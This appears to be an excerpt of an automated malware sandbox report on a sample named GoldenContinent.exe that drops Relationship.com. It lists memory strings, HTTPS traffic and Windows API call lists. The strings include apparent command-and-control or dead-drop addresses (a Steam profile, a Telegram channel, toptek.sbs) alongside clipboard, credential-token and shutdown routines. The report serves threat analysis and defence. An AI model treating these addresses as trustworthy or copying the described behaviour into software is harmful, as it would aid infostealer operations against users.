                Source: chrome.exe, 0000000F.00000003.2163554113.00007810028B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
                Source: chrome.exe, 0000000F.00000003.2163554113.00007810028B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/J
                Source: chrome.exe, 0000000F.00000003.2163554113.00007810028B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
                Source: chrome.exe, 0000000F.00000003.2203435970.0000781004A0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/shielded-email2B
                Source: chrome.exe, 0000000F.00000003.2209581318.00007810051D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2210009540.0000781003564000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogads-pa.googleapis.com
                Source: chrome.exe, 0000000F.00000003.2217545869.00007810024A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com
                Source: chrome.exe, 0000000F.00000003.2209581318.00007810051D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2210009540.0000781003564000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/app/so?eom=1
                Source: chrome.exe, 0000000F.00000003.2209581318.00007810051D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2210009540.0000781003564000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/callout?eom=1
                Source: chrome.exe, 0000000F.00000003.2172738382.0000781002C38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1678906374&target=OPTIMIZATION_TARGET_OMN
                Source: chrome.exe, 0000000F.00000003.2172738382.0000781002C38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
                Source: chrome.exe, 0000000F.00000003.2172738382.0000781002C38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695051229&target=OPTIMIZATION_TARGET_PAG
                Source: chrome.exe, 0000000F.00000003.2172738382.0000781002C38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
                Source: chrome.exe, 0000000F.00000003.2172738382.0000781002C38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=4&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
                Source: chrome.exe, 0000000F.00000003.2178034495.000078100340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2177743116.00007810032D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2177474988.00007810025A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com?referrer=CHROME_NTP
                Source: chrome.exe, 0000000F.00000003.2203435970.0000781004A0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.gcp.privacysandboxservices.com
                Source: chrome.exe, 0000000F.00000003.2203435970.0000781004A0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com
                Source: chrome.exe, 0000000F.00000003.2203435970.0000781004A0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
                Source: chrome.exe, 0000000F.00000003.2203435970.0000781004A0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com
                Source: chrome.exe, 0000000F.00000003.2203435970.0000781004A0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
                Source: chrome.exe, 0000000F.00000003.2203435970.0000781004A0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.com2
                Source: chrome.exe, 0000000F.00000003.2203435970.0000781004A0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.comJv
                Source: chrome.exe, 0000000F.00000003.2194825651.00007810024A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
                Source: chrome.exe, 0000000F.00000003.2210093169.000078100520C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2209710818.00007810051A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2211953762.0000781003E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2210058488.00007810051D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2209581318.00007810051D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
                Source: Relationship.com, 0000000A.00000002.2598479689.00000000043F1000.00000040.00001000.00020000.00000000.sdmp, Relationship.com, 0000000A.00000003.1986763504.00000000018A1000.00000004.00000020.00020000.00000000.sdmp, Relationship.com, 0000000A.00000003.1986800119.00000000043FE000.00000004.00000800.00020000.00000000.sdmp, Relationship.com, 0000000A.00000003.1986740506.00000000040F8000.00000004.00000800.00020000.00000000.sdmp, Relationship.com, 0000000A.00000002.2593745021.0000000001864000.00000004.00000020.00020000.00000000.sdmp, Relationship.com, 0000000A.00000002.2594230702.00000000040F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199809363512
                Source: Relationship.com, 0000000A.00000002.2594230702.00000000040F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199809363512m0nk3Mozilla/5.0
                Source: Relationship.com, 0000000A.00000002.2605188025.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: Relationship.com, 0000000A.00000002.2605188025.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: Relationship.com, 0000000A.00000002.2594809497.000000000422C000.00000004.00000800.00020000.00000000.sdmp, MYC2D2.10.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                Source: Relationship.com, 0000000A.00000002.2594809497.0000000004208000.00000004.00000800.00020000.00000000.sdmp, MYC2D2.10.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                Source: Relationship.com, 0000000A.00000002.2594809497.000000000422C000.00000004.00000800.00020000.00000000.sdmp, MYC2D2.10.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                Source: Relationship.com, 0000000A.00000002.2594809497.0000000004208000.00000004.00000800.00020000.00000000.sdmp, MYC2D2.10.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                Source: Relationship.com, 0000000A.00000003.1986740506.00000000040F8000.00000004.00000800.00020000.00000000.sdmp, Relationship.com, 0000000A.00000003.1986783267.00000000041A2000.00000004.00000800.00020000.00000000.sdmp, Relationship.com, 0000000A.00000003.1986532671.000000000187D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.m
                Source: Relationship.com, 0000000A.00000002.2593745021.0000000001828000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/
                Source: Relationship.com, 0000000A.00000003.1986740506.00000000040F8000.00000004.00000800.00020000.00000000.sdmp, Relationship.com, 0000000A.00000003.1986783267.00000000041A2000.00000004.00000800.00020000.00000000.sdmp, Relationship.com, 0000000A.00000003.1986532671.000000000187D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/k04
                Source: Relationship.com, 0000000A.00000002.2594436163.0000000004190000.00000004.00000800.00020000.00000000.sdmp, Relationship.com, 0000000A.00000002.2598479689.00000000043F1000.00000040.00001000.00020000.00000000.sdmp, Relationship.com, 0000000A.00000003.1986763504.00000000018A1000.00000004.00000020.00020000.00000000.sdmp, Relationship.com, 0000000A.00000003.1986800119.00000000043FE000.00000004.00000800.00020000.00000000.sdmp, Relationship.com, 0000000A.00000003.1986740506.00000000040F8000.00000004.00000800.00020000.00000000.sdmp, Relationship.com, 0000000A.00000002.2598479689.000000000443D000.00000040.00001000.00020000.00000000.sdmp, Relationship.com, 0000000A.00000002.2593745021.0000000001864000.00000004.00000020.00020000.00000000.sdmp, Relationship.com, 0000000A.00000002.2594230702.00000000040F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/k04ael
                Source: Relationship.com, 0000000A.00000002.2594436163.0000000004177000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/k04ael%mc
                Source: Relationship.com, 0000000A.00000002.2594436163.0000000004177000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/k04aelKm
                Source: Relationship.com, 0000000A.00000002.2594230702.00000000040F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/k04aelm0nk3Mozilla/5.0
                Source: Relationship.com, 0000000A.00000002.2593745021.0000000001828000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/t
                Source: Relationship.com, 0000000A.00000002.2598479689.000000000443D000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://toptek.sbs
                Source: Relationship.com, 0000000A.00000002.2604344082.0000000006995000.00000004.00000800.00020000.00000000.sdmp, Relationship.com, 0000000A.00000002.2593745021.0000000001900000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://toptek.sbs/
                Source: Relationship.com, 0000000A.00000002.2598479689.00000000043F1000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://toptek.sbs37QIMYM
                Source: Relationship.com, 0000000A.00000002.2598479689.000000000459C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://toptek.sbsI589ZCB
                Source: Relationship.com, 0000000A.00000002.2598479689.0000000004419000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://toptek.sbsc4cf99122a512nt-Disposition:
                Source: Relationship.com, 0000000A.00000002.2598479689.000000000446C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://toptek.sbsosh;
                Source: Relationship.com, 0000000A.00000002.2594436163.0000000004190000.00000004.00000800.00020000.00000000.sdmp, Relationship.com, 0000000A.00000002.2598479689.000000000443D000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
                Source: Relationship.com, 0000000A.00000002.2593745021.0000000001960000.00000004.00000020.00020000.00000000.sdmp, EC2N7Y.10.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
                Source: Relationship.com.1.dr, Futures.0.drString found in binary or memory: https://www.autoitscript.com/autoit3/
                Source: Relationship.com, 0000000A.00000002.2593745021.00000000018DE000.00000004.00000020.00020000.00000000.sdmp, 68QI5P.10.drString found in binary or memory: https://www.ecosia.org/newtab/
                Source: Relationship.com, 0000000A.00000002.2593745021.0000000001960000.00000004.00000020.00020000.00000000.sdmp, EC2N7Y.10.drString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
                Source: Futures.0.drString found in binary or memory: https://www.globalsign.com/repository/0
                Source: chrome.exe, 0000000F.00000003.2194825651.00007810024A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com
                Source: chrome.exe, 0000000F.00000003.2194825651.00007810024A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
                Source: chrome.exe, 0000000F.00000003.2194825651.00007810024A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: chrome.exe, 0000000F.00000003.2163008876.0000781002690000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2171791667.0000781002EDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2177663174.0000781002EDC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
                Source: chrome.exe, 0000000F.00000003.2203435970.0000781004A0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/go-mobile/?ios-campaign=desktop-chr-ntp&android-campaign=desktop-chr-n
                Source: chrome.exe, 0000000F.00000003.2203435970.0000781004A0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/hats/index.htmlb
                Source: Relationship.com, 0000000A.00000002.2593745021.00000000018DE000.00000004.00000020.00020000.00000000.sdmp, 68QI5P.10.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: chrome.exe, 0000000F.00000003.2210093169.000078100520C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2209710818.00007810051A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2211953762.0000781003E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2210058488.00007810051D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2209581318.00007810051D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&amp;tab=ri&amp;ogbl
                Source: chrome.exe, 0000000F.00000003.2209581318.00007810051D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2210009540.0000781003564000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=rh
                Source: chrome.exe, 0000000F.00000003.2203435970.0000781004A0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search
                Source: chrome.exe, 0000000F.00000003.2177474988.00007810025A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=$
                Source: chrome.exe, 0000000F.00000003.2194825651.00007810024A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.comAccess-Control-Allow-Credentials:
                Source: chrome.exe, 0000000F.00000003.2203435970.0000781004A0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/aida2
                Source: chrome.exe, 0000000F.00000003.2205983198.0000781004BD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager
                Source: chrome.exe, 0000000F.00000003.2203435970.0000781004A0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
                Source: chrome.exe, 0000000F.00000003.2203435970.0000781004A0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager23
                Source: chrome.exe, 0000000F.00000003.2194825651.00007810024A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
                Source: chrome.exe, 0000000F.00000003.2194825651.00007810024A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
                Source: chrome.exe, 0000000F.00000003.2209656489.00007810052A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
                Source: chrome.exe, 0000000F.00000003.2209684049.00007810052B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2210093169.000078100520C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2209855016.0000781005264000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2211953762.0000781003E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2210058488.00007810051D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2209581318.00007810051D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2209656489.00007810052A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
                Source: chrome.exe, 0000000F.00000003.2209581318.00007810051D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2210009540.0000781003564000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.otmEBJ358uU.2019.O/rt=j/m=q_dnp
                Source: chrome.exe, 0000000F.00000003.2209581318.00007810051D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2210009540.0000781003564000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd
                Source: Relationship.com, 0000000A.00000002.2605188025.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                Source: Relationship.com, 0000000A.00000002.2605188025.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                Source: Relationship.com, 0000000A.00000002.2605188025.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: Relationship.com, 0000000A.00000002.2605188025.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: Relationship.com, 0000000A.00000002.2605188025.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: chrome.exe, 0000000F.00000003.2163554113.00007810028B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/:
                Source: chrome.exe, 0000000F.00000003.2163554113.00007810028B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytca
                Source: chrome.exe, 0000000F.00000003.2163554113.00007810028B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J
                Source: chrome.exe, 0000000F.00000003.2163554113.00007810028B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
                Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
                Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
                Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
                Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
                Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
                Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49738 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 94.130.188.57:443 -> 192.168.2.4:49739 version: TLS 1.2
                Source: C:\Users\user\Desktop\GoldenContinent.exeCode function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050F9
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C6F7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,10_2_00C6F7C7
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C6F55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,10_2_00C6F55C
                Source: C:\Users\user\Desktop\GoldenContinent.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C89FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,10_2_00C89FD2
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C64763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,10_2_00C64763
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C51B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,10_2_00C51B4D
                Source: C:\Users\user\Desktop\GoldenContinent.exeCode function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,0_2_004038AF
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C5F20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,10_2_00C5F20D
                Source: C:\Users\user\Desktop\GoldenContinent.exeFile created: C:\Windows\BlacksAtomicJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeFile created: C:\Windows\AxisEachJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeFile created: C:\Windows\BecauseMarchJump to behavior
                Source: C:\Users\user\Desktop\GoldenContinent.exeCode function: 0_2_0040737E0_2_0040737E
                Source: C:\Users\user\Desktop\GoldenContinent.exeCode function: 0_2_00406EFE0_2_00406EFE
                Source: C:\Users\user\Desktop\GoldenContinent.exeCode function: 0_2_004079A20_2_004079A2
                Source: C:\Users\user\Desktop\GoldenContinent.exeCode function: 0_2_004049A80_2_004049A8
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C1801710_2_00C18017
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00BFE1F010_2_00BFE1F0
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C0E14410_2_00C0E144
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00BF22AD10_2_00BF22AD
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C122A210_2_00C122A2
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C2A26E10_2_00C2A26E
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C0C62410_2_00C0C624
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C7C8A410_2_00C7C8A4
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C2E87F10_2_00C2E87F
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C26ADE10_2_00C26ADE
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C62A0510_2_00C62A05
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C58BFF10_2_00C58BFF
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C0CD7A10_2_00C0CD7A
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C1CE1010_2_00C1CE10
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comCode function: 10_2_00C2715910_2_00C27159
